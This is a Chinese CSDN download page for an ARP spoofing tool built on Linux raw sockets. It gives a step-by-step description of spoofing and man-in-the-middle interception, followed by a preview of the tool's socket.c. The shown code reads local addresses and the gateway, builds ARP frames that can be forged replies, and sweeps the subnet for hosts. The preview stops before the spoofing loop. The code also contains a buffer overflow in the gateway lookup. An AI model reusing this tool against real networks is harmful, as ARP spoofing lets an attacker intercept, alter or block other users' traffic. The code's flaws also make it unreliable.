linux下原始socket实现ARP局域网欺骗工具_hpsocket内网多网段资源-CSDN文库

共6个文件

c：3个

h：2个

out：1个

1星需积分: 44 172 浏览量 2017-08-23 22:00:04 上传评论 6 收藏 13KB ZIP 举报

在Linux环境下，原始套接字（raw socket）是一种允许程序员访问网络协议栈底层的机制，可以用来构建自定义的网络协议或实现特定网络功能。在这个案例中，我们讨论的是使用原始套接字来实现ARP（地址解析协议）局域网欺骗工具。ARP欺骗是一种网络安全攻击手段，攻击者通过发送虚假的ARP响应来篡改网络设备的IP到MAC地址映射，从而控制或监视网络流量。理解ARP协议是至关重要的。ARP是TCP/IP协议栈的一部分，用于将IPv4地址映射到物理（MAC）地址。当主机需要向另一个IP地址发送数据时，它会查询ARP缓存，查找对应的MAC地址。如果没有找到，就会广播ARP请求，询问目标IP的MAC地址。收到请求的正确主机将回复其MAC地址，这个信息会被存储在ARP缓存中，以便后续通信。 ARP欺骗的工作原理是攻击者发送虚假的ARP响应，声称自己是某个网络设备（如网关或特定主机），导致其他设备将流量发送到攻击者的接口。这可能导致中间人攻击，攻击者可以拦截、修改或阻止网络通信。在Linux下实现ARP欺骗，需要以下关键步骤： 1. **创建原始套接字**：使用`socket()`函数创建一个RAW类型套接字，通常设置协议为`AF_PACKET`和`SOCK_RAW`。 2. **绑定接口**：通过`bind()`函数将套接字与特定网络接口关联，这样我们可以监听和发送该接口上的所有ARP数据包。 3. **构造ARP包**：使用`struct arphdr`定义ARP包结构，并填充相应的字段，包括硬件类型、协议类型、操作码（请求或响应）、源和目标的硬件和协议地址。 4. **发送ARP包**：使用`sendto()`或`write()`函数将构造好的ARP包发送到网络。在ARP欺骗中，我们将发送虚假的响应包。 5. **接收和处理ARP包**：使用`recvfrom()`函数接收网络上的ARP包，分析并可能根据需要对这些包做出响应。 6. **循环欺骗**：为了维持欺骗状态，需要持续发送虚假ARP响应，覆盖正常的映射信息。在LAN_tool这个文件中，很可能包含了一个实现上述功能的程序。此程序可能包含以下部分：配置选项解析、网络接口选择、ARP包构造和发送逻辑、以及一个循环来持续发送欺骗包。为了安全使用这样的工具，需要深入理解ARP协议和可能的风险，以免无意中破坏网络环境或触犯法律。总结起来，Linux下的原始套接字提供了对ARP协议的底层访问，使得开发者能够实现ARP欺骗工具。这种工具虽然在网络安全研究和测试中有用，但滥用可能会导致严重的安全问题。因此，对ARP欺骗的理解和应用应始终谨慎行事。

资源推荐

资源详情

资源评论

收起资源包目录

ARP.zip （6个子文件）

LAN_tool

function.h 415B

function.c 4KB

socket.c 10KB

socket.h 1KB

a.out 16KB

main.c 1KB

/*=============================================================== * Copyright (C) 2017 All rights reserved. * * 文件名称：socket.c * 创建者：陈迪林 * 创建日期：2017年07月20日 * 描述： * * 更新日志： * ================================================================*/ #include <stdio.h> #include <string.h> #include <unistd.h> #include <stdlib.h> #include <arpa/inet.h> #include <errno.h> #include <sys/socket.h> #include <sys/ioctl.h> #include <sys/types.h> #include <netinet/in.h> #include <netinet/ip.h> #include <netinet/if_ether.h> #include <net/if_arp.h> #include <netpacket/packet.h> #include <net/if.h> #include <net/ethernet.h> #include <fcntl.h> #include "socket.h" /************************ 函数功能:获取本机mac地址参数：存放mac地址的指针返回值：0 成功 -1 失败 ************************/ int getlocalmac(unsigned char *mac) { int s = socket(AF_INET, SOCK_DGRAM, 0); struct ifreq req; strcpy(req.ifr_name,IF_NAME); /* IF_NAME = "eth0" interface name */ if(-1 != ioctl(s,SIOCGIFHWADDR,&req)) { close(s); memcpy(mac,req.ifr_hwaddr.sa_data,6); return 0; } else { perror("ioctl error"); close(s); return -1; } } /****************************** 函数功能:获取本机IP 参数：无返回值：成功网络字节序的IP地址失败 -1 ******************************/ int getlocalip() { int s = socket(AF_INET, SOCK_DGRAM, 0); struct ifreq req; int ip; strcpy(req.ifr_name,IF_NAME); if(-1 != ioctl(s, SIOCGIFADDR, &req)) { close(s); ip = (int)(((struct sockaddr_in *)(&req.ifr_addr))->sin_addr).s_addr; return ip; } else { perror("ioctl error"); close(s); return -1; } } /****************************** 函数功能:获取网关ip地址参数：无返回值：成功网络字节序的网关IP地址失败 -1 ******************************/ int getgateway() { FILE* gw_fd; char temp[100],szNetGate[20]; if(gw_fd = popen("route -n | grep 'UG'", "r")) { fread(temp,1,128, gw_fd); sscanf(temp, "%*s%s", szNetGate); return inet_addr(szNetGate); } else return -1; } /************************************ 函数功能:填充ARP数据帧参数： arp_frame:待填充的arp数据帧指针 type:2位arp响应包 1为arp广播包返回值：成功 0 失败 -1 ************************************/ int fill_arp_frame(ARPFRAME *arp_frame, unsigned char type, unsigned char *dst,\ unsigned char *src, int sender_ip, int target_ip) { int i = 0; for(i=0;i<6;i++) { arp_frame->dst[i] = dst[i]; arp_frame->src[i] = src[i]; arp_frame->sender_mac[i] = src[i]; arp_frame->target_mac[i] = dst[i]; } arp_frame->type = htons(0x0806);/*0806表示协议为arp协议，将0x0806转换成网络字节序放入type字段*/ arp_frame->htype = htons(0x01);/*硬件类型 1：以太网*/ arp_frame->ptype = htons(0x0800);/*arp使用的上层协议 ip*/ arp_frame->hlen = 6;/*mac length*/ arp_frame->plen = 4;/*ip length*/ arp_frame->oper = htons(type);/* arp帧类型 2为响应包 1为广播包 */ arp_frame->sender_ip = sender_ip; arp_frame->target_ip = target_ip; } /************************************** 函数功能:发现局域网主机参数： ip：发现结果存入ip指向的数组中 size: 发现的主机数返回值：成功 0 失败 -1 **************************************/ int find_host(unsigned char mac[255][6], int *ip, int *size) { ARPFRAME arp_frame = {0}; unsigned char localmac[6],dst_mac[6]; int localip, targetip; getlocalmac(localmac); localip = getlocalip(); targetip = localip; int i; for(i=0;i<6;i++) dst_mac[i] = 0xff; fill_arp_frame(&arp_frame, 1, dst_mac, localmac, localip, targetip); /* 为发送数据帧做准备创建发送数据的socket */ int send_sock; if((send_sock=socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL))) < 0) { perror("send creat error"); return -1; } struct sockaddr_ll toaddr; struct ifreq ifr; bzero(&toaddr,sizeof(toaddr)); bzero(&ifr,sizeof(ifr)); strcpy(ifr.ifr_name, IF_NAME); /*用于获取IF_NAME网卡索引*/ if(-1 == ioctl(send_sock,SIOCGIFINDEX,&ifr))/**/ { perror("get dev index error"); return -1; } toaddr.sll_ifindex = ifr.ifr_ifindex; /* 网卡索引发送和接收数据时需要用到网卡的索引 */ toaddr.sll_family = PF_PACKET; /* 获取数据链路层数据 */ /* 为接收数据做准备创建接收数据的socket */ int recv_sock; if((recv_sock=socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ARP))) < 0) { perror("recv socket create error"); return -1; } if(-1 == fcntl(recv_sock, F_SETFL, O_NONBLOCK))/* 设置socket为超时模式 */ { perror("fcntl error"); return -1; } /* 超时模式所需要的数据 */ struct timeval tv; fd_set readfds; tv.tv_sec = 1; tv.tv_usec = 1; FD_ZERO(&readfds); FD_SET(recv_sock,&readfds); unsigned char *p = (unsigned char *)&arp_frame.target_ip; /* 发送构造好的以太网数据帧广播每台主机 */ for(i=1;i<255;i++) { p[3]=i; sendto(send_sock,&arp_frame,sizeof(arp_frame),0,(struct sockaddr*)&toaddr,sizeof(toaddr)); } int cnt=0; ARPFRAME recv_arpdat; while(select(recv_sock+1, &readfds, NULL, NULL, &tv) > 0) /* 是否有数据来到是否超时 */ { recvfrom(recv_sock, &recv_arpdat, sizeof(recv_arpdat), 0, NULL, NULL); if(arp_frame.type == htons(0x0806) && recv_arpdat.oper==htons(0x02))/*0806表示协议为arp协议，将0x0806转换成网络字节序放入type字段*/ { ip[cnt] = recv_arpdat.sender_ip; memcpy(&mac[cnt][0], &recv_arpdat.sender_mac[0], 6); //printf("%x -> %02x:%02x:%02x:%02x:%02x:%02x\n",ip[cnt],mac[cnt][0],mac[cnt][1],mac[cnt][2],\ // mac[cnt][3],mac[cnt][4],mac[cnt][5]); cnt++; } tv.tv_sec = 1; tv.tv_usec = 1; } //printf("%d PC finded.\n",cnt); int j; unsigned char *pp; /* 冒泡排序 */ for(i=0;i<cnt;i++) { for(j=0;j<cnt-i-1;j++) { p = (unsigned char *)&ip[j]; /* 按照主机号进行排序 */ pp = (unsigned char *)&ip[j+1]; if(p[3] > pp[3]) { int temp; unsigned char nmac[6]; memcpy(&nmac[0], &mac[j][0], 6); memcpy(&mac[j][0], &mac[j+1][0], 6); memcpy(&mac[j+1][0], &nmac[0], 6); temp = ip[j]; ip[j] = ip[j+1]; ip[j+1] = temp; } } } *size = cnt; close(recv_sock); close(send_sock); return 0; } /************************************** 函数功能:通过IP获取局域网主机MAC地址参数： ip：要获取mac主机的ip地址 mac：获取到的mac地址保存在mac中返回值：成功 0 失败 -1 **************************************/ int getmacbyip(char *ip, unsigned char *mac) { ARPFRAME arp_frame = {0}; unsigned char localmac[6],dst_mac[6]; int localip, targetip; getlocalmac(localmac); localip = getlocalip(); targetip = inet_addr(ip); int i; for(i=0;i<6;i++) dst_mac[i] = 0xff; fill_arp_frame(&arp_frame, 1, dst_mac, localmac, localip, targetip); /* 为发送数据帧做准备创建发送数据的socket */ int send_sock; if((send_sock=socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL))) < 0) { perror("send creat error"); return -1; } struct sockaddr_ll toaddr; struct ifreq ifr; bzero(&toaddr,sizeof(toaddr)); bzero(&ifr,sizeof(ifr)); strcpy(ifr.ifr_name, IF_NAME); /*用于获取IF_NAME网卡索引*/ if(-1 == ioctl(send_sock,SIOCGIFINDEX,&ifr))/**/ { perror("get dev index error"); return -1; } toaddr.sll_ifindex = ifr.ifr_ifindex; /* 网卡索引发送和接收数据时需要用到网卡的索引 */ toaddr.sll_family = PF_PACKET; /* 获取数据链路层数据 */ /* 为接收数据做准备创建接收数据的socket */ int recv_sock; if((recv_sock=socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL))) < 0) { perror("recv creat error"); return -1; } if(-1 == fcntl(recv_sock, F_SETFL, O_NONBLOCK))/* 设置socket为超时模式 */ { perror("fcntl error"); return -1; } /* 超时模式所需要的数据 */ struct timeval tv; fd_set readfds; tv.tv_sec = 1;

评论收藏

内容反馈